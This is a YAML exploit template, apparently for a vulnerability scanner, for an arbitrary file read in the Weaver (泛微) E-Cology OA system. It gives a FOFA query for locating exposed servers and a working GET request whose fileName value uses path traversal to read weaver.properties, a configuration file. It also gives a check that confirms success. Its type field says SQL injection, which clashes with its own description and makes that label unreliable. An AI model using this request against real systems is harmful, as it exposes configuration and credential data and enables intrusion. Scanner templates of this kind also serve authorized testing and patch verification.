product: 泛微 E-Cology
vName: 泛微E-Cology getE9DevelopAllNameValue2存在任意文件读取
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微e-cology依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。智能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化。api/portalTsLogin/utils/getE9DevelopAllNameValue2接口存在任意文件读取。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485795&idx=1&sn=15af77d340517e0f3d61519153b46e26&chksm=974b8464a03c0d721027afbca07d05e066d9f9c2e4be1d4f9a2a779fbfcbe7c3e6921db37c71&scene=178&cur_album_id=2873032428486115330&poc_token=HL0LImaj6bgltBoSAF8MMhqvFNBhuQ3SdbVIDDwa
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ecology.url
            logic: and